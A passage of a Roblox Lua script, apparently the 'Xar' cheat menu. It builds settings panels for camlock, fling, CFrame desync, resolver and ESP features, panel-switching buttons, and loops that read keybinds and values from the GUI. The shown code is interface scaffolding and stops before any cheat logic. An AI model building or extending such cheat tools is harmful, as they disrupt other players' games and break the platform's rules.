	Xar_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Xar_5.BorderSizePixel = 0
	Xar_5.Position = UDim2.new(-0.00300000003, 0, -0.00100000005, 0)
	Xar_5.Size = UDim2.new(0, 60, 0, 30)
	Xar_5.Font = Enum.Font.Unknown
	Xar_5.Text = "Xar"
	Xar_5.TextColor3 = Color3.fromRGB(255, 255, 255)
	Xar_5.TextScaled = true
	Xar_5.TextSize = 14.000
	Xar_5.TextWrapped = true

	ResolverSettings.Name = "ResolverSettings"
	ResolverSettings.Parent = XarGui1
	ResolverSettings.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	ResolverSettings.BorderColor3 = Color3.fromRGB(0, 0, 0)
	ResolverSettings.BorderSizePixel = 0
	ResolverSettings.Position = UDim2.new(0.307098776, 0, 0.259282976, 0)
	ResolverSettings.Size = UDim2.new(0, 500, 0, 300)
	ResolverSettings.Visible = false

	UICorner_25.Parent = ResolverSettings

	Frame_5.Parent = ResolverSettings
	Frame_5.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Frame_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Frame_5.BorderSizePixel = 0
	Frame_5.Position = UDim2.new(0.100000001, 0, 0.166666672, 0)
	Frame_5.Size = UDim2.new(0, 399, 0, 221)

	UICorner_26.Parent = Frame_5

	Keybind_5.Name = "Keybind"
	Keybind_5.Parent = Frame_5
	Keybind_5.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_5.BackgroundTransparency = 0.500
	Keybind_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_5.BorderSizePixel = 0
	Keybind_5.Position = UDim2.new(0.250626564, 0, 0.235294119, 0)
	Keybind_5.Size = UDim2.new(0, 200, 0, 50)
	Keybind_5.Font = Enum.Font.Unknown
	Keybind_5.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_5.PlaceholderText = "Keybind"
	Keybind_5.Text = "U"
	Keybind_5.TextColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_5.TextScaled = true
	Keybind_5.TextSize = 14.000
	Keybind_5.TextWrapped = true

	UICorner_27.Parent = Keybind_5

	Text1_5.Name = "Text1"
	Text1_5.Parent = Frame_5
	Text1_5.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	Text1_5.BackgroundTransparency = 1.000
	Text1_5.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text1_5.BorderSizePixel = 0
	Text1_5.Position = UDim2.new(0.145363405, 0, -0.00361985434, 0)
	Text1_5.Size = UDim2.new(0, 283, 0, 50)
	Text1_5.Font = Enum.Font.Unknown
	Text1_5.Text = "Resolver Settings"
	Text1_5.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text1_5.TextScaled = true
	Text1_5.TextSize = 14.000
	Text1_5.TextWrapped = true

	Text2_6.Name = "Text2"
	Text2_6.Parent = Frame_5
	Text2_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Text2_6.BackgroundTransparency = 1.000
	Text2_6.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text2_6.BorderSizePixel = 0
	Text2_6.Position = UDim2.new(0.0477258191, 0, -0.23148632, 0)
	Text2_6.Size = UDim2.new(0, 360, 0, 30)
	Text2_6.Font = Enum.Font.PatrickHand
	Text2_6.Text = "made by @222antt on rblx and discord | V1.3"
	Text2_6.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text2_6.TextSize = 18.000
	Text2_6.TextWrapped = true

	Xar_6.Name = "Xar"
	Xar_6.Parent = ResolverSettings
	Xar_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Xar_6.BackgroundTransparency = 1.000
	Xar_6.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Xar_6.BorderSizePixel = 0
	Xar_6.Position = UDim2.new(-0.00300000003, 0, -0.00100000005, 0)
	Xar_6.Size = UDim2.new(0, 60, 0, 30)
	Xar_6.Font = Enum.Font.Unknown
	Xar_6.Text = "Xar"
	Xar_6.TextColor3 = Color3.fromRGB(255, 255, 255)
	Xar_6.TextScaled = true
	Xar_6.TextSize = 14.000
	Xar_6.TextWrapped = true

	FlingSettings.Name = "FlingSettings"
	FlingSettings.Parent = XarGui1
	FlingSettings.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	FlingSettings.BorderColor3 = Color3.fromRGB(0, 0, 0)
	FlingSettings.BorderSizePixel = 0
	FlingSettings.Position = UDim2.new(0.307098776, 0, 0.259282976, 0)
	FlingSettings.Size = UDim2.new(0, 500, 0, 300)
	FlingSettings.Visible = false

	UICorner_28.Parent = FlingSettings

	Frame_6.Parent = FlingSettings
	Frame_6.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Frame_6.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Frame_6.BorderSizePixel = 0
	Frame_6.Position = UDim2.new(0.100000001, 0, 0.166666672, 0)
	Frame_6.Size = UDim2.new(0, 399, 0, 221)

	UICorner_29.Parent = Frame_6

	Keybind_6.Name = "Keybind"
	Keybind_6.Parent = Frame_6
	Keybind_6.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_6.BackgroundTransparency = 0.500
	Keybind_6.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_6.BorderSizePixel = 0
	Keybind_6.Position = UDim2.new(0.250626564, 0, 0.235294119, 0)
	Keybind_6.Size = UDim2.new(0, 200, 0, 50)
	Keybind_6.Font = Enum.Font.Unknown
	Keybind_6.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_6.PlaceholderText = "Keybind"
	Keybind_6.Text = "H"
	Keybind_6.TextColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_6.TextScaled = true
	Keybind_6.TextSize = 14.000
	Keybind_6.TextWrapped = true

	UICorner_30.Parent = Keybind_6

	Text1_6.Name = "Text1"
	Text1_6.Parent = Frame_6
	Text1_6.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	Text1_6.BackgroundTransparency = 1.000
	Text1_6.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text1_6.BorderSizePixel = 0
	Text1_6.Position = UDim2.new(0.145363405, 0, -0.00361985434, 0)
	Text1_6.Size = UDim2.new(0, 283, 0, 50)
	Text1_6.Font = Enum.Font.Unknown
	Text1_6.Text = "Fling Setings"
	Text1_6.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text1_6.TextScaled = true
	Text1_6.TextSize = 14.000
	Text1_6.TextWrapped = true

	Text2_7.Name = "Text2"
	Text2_7.Parent = Frame_6
	Text2_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Text2_7.BackgroundTransparency = 1.000
	Text2_7.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text2_7.BorderSizePixel = 0
	Text2_7.Position = UDim2.new(0.0477258191, 0, -0.23148632, 0)
	Text2_7.Size = UDim2.new(0, 360, 0, 30)
	Text2_7.Font = Enum.Font.PatrickHand
	Text2_7.Text = "made by @222antt on rblx and discord | V1.3"
	Text2_7.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text2_7.TextSize = 18.000
	Text2_7.TextWrapped = true

	Xar_7.Name = "Xar"
	Xar_7.Parent = FlingSettings
	Xar_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Xar_7.BackgroundTransparency = 1.000
	Xar_7.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Xar_7.BorderSizePixel = 0
	Xar_7.Position = UDim2.new(-0.00300000003, 0, -0.00100000005, 0)
	Xar_7.Size = UDim2.new(0, 60, 0, 30)
	Xar_7.Font = Enum.Font.Unknown
	Xar_7.Text = "Xar"
	Xar_7.TextColor3 = Color3.fromRGB(255, 255, 255)
	Xar_7.TextScaled = true
	Xar_7.TextSize = 14.000
	Xar_7.TextWrapped = true

	CamlockSettings.Name = "CamlockSettings"
	CamlockSettings.Parent = XarGui1
	CamlockSettings.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	CamlockSettings.BorderColor3 = Color3.fromRGB(0, 0, 0)
	CamlockSettings.BorderSizePixel = 0
	CamlockSettings.Position = UDim2.new(0.307098776, 0, 0.259282976, 0)
	CamlockSettings.Size = UDim2.new(0, 500, 0, 300)
	CamlockSettings.Visible = false

	UICorner_31.Parent = CamlockSettings

	Frame_7.Parent = CamlockSettings
	Frame_7.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Frame_7.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Frame_7.BorderSizePixel = 0
	Frame_7.Position = UDim2.new(0.100000001, 0, 0.166666672, 0)
	Frame_7.Size = UDim2.new(0, 399, 0, 221)

	UICorner_32.Parent = Frame_7

	Keybind_7.Name = "Keybind"
	Keybind_7.Parent = Frame_7
	Keybind_7.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_7.BackgroundTransparency = 0.500
	Keybind_7.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_7.BorderSizePixel = 0
	Keybind_7.Position = UDim2.new(0.250626564, 0, 0.235294119, 0)
	Keybind_7.Size = UDim2.new(0, 200, 0, 50)
	Keybind_7.Font = Enum.Font.Unknown
	Keybind_7.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_7.PlaceholderText = "Keybind"
	Keybind_7.Text = "X"
	Keybind_7.TextColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_7.TextScaled = true
	Keybind_7.TextSize = 14.000
	Keybind_7.TextWrapped = true

	UICorner_33.Parent = Keybind_7

	Offset.Name = "Offset"
	Offset.Parent = Frame_7
	Offset.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Offset.BackgroundTransparency = 0.500
	Offset.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Offset.BorderSizePixel = 0
	Offset.Position = UDim2.new(0.250626564, 0, 0.533936679, 0)
	Offset.Size = UDim2.new(0, 200, 0, 50)
	Offset.Font = Enum.Font.Unknown
	Offset.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Offset.PlaceholderText = "Offset"
	Offset.Text = ".15"
	Offset.TextColor3 = Color3.fromRGB(255, 255, 255)
	Offset.TextScaled = true
	Offset.TextSize = 14.000
	Offset.TextWrapped = true

	UICorner_34.Parent = Offset

	Text1_7.Name = "Text1"
	Text1_7.Parent = Frame_7
	Text1_7.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	Text1_7.BackgroundTransparency = 1.000
	Text1_7.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text1_7.BorderSizePixel = 0
	Text1_7.Position = UDim2.new(0.145363405, 0, -0.00361985434, 0)
	Text1_7.Size = UDim2.new(0, 283, 0, 50)
	Text1_7.Font = Enum.Font.Unknown
	Text1_7.Text = "Camlock Settings"
	Text1_7.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text1_7.TextScaled = true
	Text1_7.TextSize = 14.000
	Text1_7.TextWrapped = true

	Text2_8.Name = "Text2"
	Text2_8.Parent = Frame_7
	Text2_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Text2_8.BackgroundTransparency = 1.000
	Text2_8.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text2_8.BorderSizePixel = 0
	Text2_8.Position = UDim2.new(0.0477258191, 0, -0.23148632, 0)
	Text2_8.Size = UDim2.new(0, 360, 0, 30)
	Text2_8.Font = Enum.Font.PatrickHand
	Text2_8.Text = "made by @222antt on rblx and discord | V1.3"
	Text2_8.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text2_8.TextSize = 18.000
	Text2_8.TextWrapped = true

	Xar_8.Name = "Xar"
	Xar_8.Parent = CamlockSettings
	Xar_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Xar_8.BackgroundTransparency = 1.000
	Xar_8.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Xar_8.BorderSizePixel = 0
	Xar_8.Position = UDim2.new(-0.00300000003, 0, -0.00100000005, 0)
	Xar_8.Size = UDim2.new(0, 60, 0, 30)
	Xar_8.Font = Enum.Font.Unknown
	Xar_8.Text = "Xar"
	Xar_8.TextColor3 = Color3.fromRGB(255, 255, 255)
	Xar_8.TextScaled = true
	Xar_8.TextSize = 14.000
	Xar_8.TextWrapped = true

	CFrameDesyncSettings.Name = "CFrameDesyncSettings"
	CFrameDesyncSettings.Parent = XarGui1
	CFrameDesyncSettings.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	CFrameDesyncSettings.BorderColor3 = Color3.fromRGB(0, 0, 0)
	CFrameDesyncSettings.BorderSizePixel = 0
	CFrameDesyncSettings.Position = UDim2.new(0.307098776, 0, 0.259282976, 0)
	CFrameDesyncSettings.Size = UDim2.new(0, 500, 0, 300)
	CFrameDesyncSettings.Visible = false

	UICorner_35.Parent = CFrameDesyncSettings

	Frame_8.Parent = CFrameDesyncSettings
	Frame_8.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
	Frame_8.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Frame_8.BorderSizePixel = 0
	Frame_8.Position = UDim2.new(0.100000001, 0, 0.166666672, 0)
	Frame_8.Size = UDim2.new(0, 399, 0, 221)

	UICorner_36.Parent = Frame_8

	Keybind_8.Name = "Keybind"
	Keybind_8.Parent = Frame_8
	Keybind_8.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_8.BackgroundTransparency = 0.500
	Keybind_8.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Keybind_8.BorderSizePixel = 0
	Keybind_8.Position = UDim2.new(0.250626564, 0, 0.235294119, 0)
	Keybind_8.Size = UDim2.new(0, 200, 0, 50)
	Keybind_8.Font = Enum.Font.Unknown
	Keybind_8.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_8.PlaceholderText = "Keybind"
	Keybind_8.Text = "B"
	Keybind_8.TextColor3 = Color3.fromRGB(255, 255, 255)
	Keybind_8.TextScaled = true
	Keybind_8.TextSize = 14.000
	Keybind_8.TextWrapped = true

	UICorner_37.Parent = Keybind_8

	Radius.Name = "Radius"
	Radius.Parent = Frame_8
	Radius.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
	Radius.BackgroundTransparency = 0.500
	Radius.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Radius.BorderSizePixel = 0
	Radius.Position = UDim2.new(0.250626564, 0, 0.533936679, 0)
	Radius.Size = UDim2.new(0, 200, 0, 50)
	Radius.Font = Enum.Font.Unknown
	Radius.PlaceholderColor3 = Color3.fromRGB(255, 255, 255)
	Radius.PlaceholderText = "Radius"
	Radius.Text = "10"
	Radius.TextColor3 = Color3.fromRGB(255, 255, 255)
	Radius.TextScaled = true
	Radius.TextSize = 14.000
	Radius.TextWrapped = true

	UICorner_38.Parent = Radius

	Text1_8.Name = "Text1"
	Text1_8.Parent = Frame_8
	Text1_8.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
	Text1_8.BackgroundTransparency = 1.000
	Text1_8.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text1_8.BorderSizePixel = 0
	Text1_8.Position = UDim2.new(0.145363405, 0, -0.00361985434, 0)
	Text1_8.Size = UDim2.new(0, 283, 0, 50)
	Text1_8.Font = Enum.Font.Unknown
	Text1_8.Text = "CFrame Desync Settings"
	Text1_8.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text1_8.TextScaled = true
	Text1_8.TextSize = 14.000
	Text1_8.TextWrapped = true

	Text2_9.Name = "Text2"
	Text2_9.Parent = Frame_8
	Text2_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Text2_9.BackgroundTransparency = 1.000
	Text2_9.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Text2_9.BorderSizePixel = 0
	Text2_9.Position = UDim2.new(0.0477258191, 0, -0.23148632, 0)
	Text2_9.Size = UDim2.new(0, 360, 0, 30)
	Text2_9.Font = Enum.Font.PatrickHand
	Text2_9.Text = "made by @222antt on rblx and discord | V1.3"
	Text2_9.TextColor3 = Color3.fromRGB(255, 255, 255)
	Text2_9.TextSize = 18.000
	Text2_9.TextWrapped = true

	Xar_9.Name = "Xar"
	Xar_9.Parent = CFrameDesyncSettings
	Xar_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Xar_9.BackgroundTransparency = 1.000
	Xar_9.BorderColor3 = Color3.fromRGB(0, 0, 0)
	Xar_9.BorderSizePixel = 0
	Xar_9.Position = UDim2.new(-0.00300000003, 0, -0.00100000005, 0)
	Xar_9.Size = UDim2.new(0, 60, 0, 30)
	Xar_9.Font = Enum.Font.Unknown
	Xar_9.Text = "Xar"
	Xar_9.TextColor3 = Color3.fromRGB(255, 255, 255)
	Xar_9.TextScaled = true
	Xar_9.TextSize = 14.000
	Xar_9.TextWrapped = true

	-- Scripts:

	local function DBUCT_fake_script() -- Speed.LocalScript 
		local script = Instance.new('LocalScript', Speed)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Visible = false
			local Frame = "SpeedSettings"
			script.Parent.Parent.Parent.Parent:FindFirstChild(Frame).Visible = true
		end)
	end
	coroutine.wrap(DBUCT_fake_script)()
	local function WTWP_fake_script() -- Camlock.LocalScript 
		local script = Instance.new('LocalScript', Camlock)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Visible = false
			local Frame = "CamlockSettings"
			script.Parent.Parent.Parent.Parent:FindFirstChild(Frame).Visible = true
		end)
	end
	coroutine.wrap(WTWP_fake_script)()
	local function LULXS_fake_script() -- Orbit.LocalScript 
		local script = Instance.new('LocalScript', Orbit)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Visible = false
			local Frame = "OrbitSettings"
			script.Parent.Parent.Parent.Parent:FindFirstChild(Frame).Visible = true
		end)
	end
	coroutine.wrap(LULXS_fake_script)()
	local function SOVWTAZ_fake_script() -- Anti.LocalScript 
		local script = Instance.new('LocalScript', Anti)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Visible = false
			local Frame = "AntiLockSettings"
			script.Parent.Parent.Parent.Parent:FindFirstChild(Frame).Visible = true
		end)
	end
	coroutine.wrap(SOVWTAZ_fake_script)()
	local function MUBRU_fake_script() -- CFrameDesync.LocalScript 
		local script = Instance.new('LocalScript', CFrameDesync)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Visible = false
			local Frame = "CFrameDesyncSettings"
			script.Parent.Parent.Parent.Parent:FindFirstChild(Frame).Visible = true
		end)
	end
	coroutine.wrap(MUBRU_fake_script)()
	local function RINXZ_fake_script() -- Resolver.LocalScript 
		local script = Instance.new('LocalScript', Resolver)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Visible = false
			local Frame = "ResolverSettings"
			script.Parent.Parent.Parent.Parent:FindFirstChild(Frame).Visible = true
		end)
	end
	coroutine.wrap(RINXZ_fake_script)()
	local function IATLM_fake_script() -- Fling.LocalScript 
		local script = Instance.new('LocalScript', Fling)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Visible = false
			local Frame = "FlingSettings"
			script.Parent.Parent.Parent.Parent:FindFirstChild(Frame).Visible = true
		end)
	end
	coroutine.wrap(IATLM_fake_script)()
	local function DRBYTG_fake_script() -- ESP.LocalScript 
		local script = Instance.new('LocalScript', ESP)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Visible = false
			local Frame = "ESPSettings"
			script.Parent.Parent.Parent.Parent:FindFirstChild(Frame).Visible = true
		end)
	end
	coroutine.wrap(DRBYTG_fake_script)()
	local function SLZWZ_fake_script() -- Xar_2.LocalScript 
		local script = Instance.new('LocalScript', Xar_2)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Parent.BaseFrame.Buttons.Visible = true
			script.Parent.Parent.Parent:FindFirstChild("SpeedSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CamlockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("OrbitSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("AntiLockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CFrameDesyncSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ResolverSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("FlingSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ESPSettings").Visible = false
		end)
	end
	coroutine.wrap(SLZWZ_fake_script)()
	local function UUQCCPM_fake_script() -- Xar_3.LocalScript 
		local script = Instance.new('LocalScript', Xar_3)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Parent.BaseFrame.Buttons.Visible = true
			script.Parent.Parent.Parent:FindFirstChild("SpeedSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CamlockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("OrbitSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("AntiLockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CFrameDesyncSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ResolverSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("FlingSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ESPSettings").Visible = false
		end)
	end
	coroutine.wrap(UUQCCPM_fake_script)()
	local function VGCXB_fake_script() -- Xar_4.LocalScript 
		local script = Instance.new('LocalScript', Xar_4)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Parent.BaseFrame.Buttons.Visible = true
			script.Parent.Parent.Parent:FindFirstChild("SpeedSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CamlockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("OrbitSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("AntiLockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CFrameDesyncSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ResolverSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("FlingSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ESPSettings").Visible = false
		end)
	end
	coroutine.wrap(VGCXB_fake_script)()
	local function OWOVT_fake_script() -- Xar_5.LocalScript 
		local script = Instance.new('LocalScript', Xar_5)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Parent.BaseFrame.Buttons.Visible = true
			script.Parent.Parent.Parent:FindFirstChild("SpeedSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CamlockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("OrbitSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("AntiLockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CFrameDesyncSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ResolverSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("FlingSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ESPSettings").Visible = false
		end)
	end
	coroutine.wrap(OWOVT_fake_script)()
	local function CVVFH_fake_script() -- Xar_6.LocalScript 
		local script = Instance.new('LocalScript', Xar_6)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Parent.BaseFrame.Buttons.Visible = true
			script.Parent.Parent.Parent:FindFirstChild("SpeedSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CamlockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("OrbitSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("AntiLockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CFrameDesyncSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ResolverSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("FlingSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ESPSettings").Visible = false
		end)
	end
	coroutine.wrap(CVVFH_fake_script)()
	local function WDACL_fake_script() -- Xar_7.LocalScript 
		local script = Instance.new('LocalScript', Xar_7)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Parent.BaseFrame.Buttons.Visible = true
			script.Parent.Parent.Parent:FindFirstChild("SpeedSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CamlockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("OrbitSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("AntiLockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CFrameDesyncSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ResolverSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("FlingSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ESPSettings").Visible = false
		end)
	end
	coroutine.wrap(WDACL_fake_script)()
	local function QXOHAQL_fake_script() -- Xar_8.LocalScript 
		local script = Instance.new('LocalScript', Xar_8)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Parent.BaseFrame.Buttons.Visible = true
			script.Parent.Parent.Parent:FindFirstChild("SpeedSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CamlockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("OrbitSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("AntiLockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CFrameDesyncSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ResolverSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("FlingSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ESPSettings").Visible = false
		end)
	end
	coroutine.wrap(QXOHAQL_fake_script)()
	local function KTFN_fake_script() -- Xar_9.LocalScript 
		local script = Instance.new('LocalScript', Xar_9)

		script.Parent.MouseButton1Down:Connect(function()
			script.Parent.Parent.Parent.BaseFrame.Buttons.Visible = true
			script.Parent.Parent.Parent:FindFirstChild("SpeedSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CamlockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("OrbitSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("AntiLockSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("CFrameDesyncSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ResolverSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("FlingSettings").Visible = false
			script.Parent.Parent.Parent:FindFirstChild("ESPSettings").Visible = false
		end)
	end
	coroutine.wrap(KTFN_fake_script)()
	local function IKEDUIU_fake_script() -- XarGui1.LocalScript
		local script = Instance.new("LocalScript", XarGui1)

		local UIS = game:GetService("UserInputService")
		UIS.InputBegan:Connect(
			function(Input, IsTyping)
				if Input.KeyCode == Enum.KeyCode.P then
					if IsTyping then
						return
					end
					script.Parent.Enabled = not script.Parent.Enabled
				end
			end
		)
	end
	coroutine.wrap(IKEDUIU_fake_script)()

end)

local UIS = game:GetService("UserInputService")
local Player = game:GetService("Players").LocalPlayer
local Cam = workspace.CurrentCamera
local Mouse = Player:GetMouse()
local Character = Player.Character
local V_Active = false
local X_Active = false
local Z_Active = false
local Y_Active = false
local L_Active = false
local N_Active = false
local U_Active = false
local B_Active = false
local J_Active = false
local lastTarget = ""

local SpeedKey = "Z"
local CamKey = "X"
local OrbitKey = "V"
local AntiKey = "Y"
local CFrmDesyncKey = "B"
local ResolverKey = "U"
local FlingKey = "H"
local ESPKey = "L"

local Offset = .15
local Speed = 2.5
local Height = 25
local Radius = 10

task.spawn(function()
	Player.Character:WaitForChild("BodyEffects"):WaitForChild("Movement"):FindFirstChild("NoJumping")
	Player.CharacterAdded:Connect(function(C)
		task.wait(1)
		C:WaitForChild("BodyEffects"):WaitForChild("Movement"):FindFirstChild("NoJumping")
	end)
end)

task.spawn(
	function()
		while task.wait(1) do
			task.spawn(
				function()
					CamKey =
						game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("CamlockSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Keybind").Text
					Offset =
						tonumber(
							game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("CamlockSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Offset").Text
						)
				end
			)
		end
	end
)

task.spawn(
	function()
		while task.wait(1) do
			task.spawn(
				function()
					SpeedKey =
						game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("SpeedSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Keybind").Text
					Speed =
						tonumber(
							game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("SpeedSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Speed").Text
						)
				end
			)
		end
	end
)

task.spawn(
	function()
		while task.wait(1) do
			task.spawn(
				function()
					OrbitKey =
						game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("OrbitSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Keybind").Text
					Height =
						tonumber(
							game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("OrbitSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Height").Text
						)
				end
			)
		end
	end
)

task.spawn(
	function()
		while task.wait(1) do
			task.spawn(
				function()
					CFrmDesyncKey =
						game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("CFrameDesyncSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Keybind").Text
					Radius =
						tonumber(
							game.Players.LocalPlayer.PlayerGui:WaitForChild("XarGui1"):WaitForChild("CFrameDesyncSettings"):FindFirstChildOfClass("Frame"):WaitForChild("Radius").Text
						)
				end
			)
		end
	end
)

task.spawn(
	function()
		while task.wait(1) do
			task.spawn(
				function()
					ResolverKey =
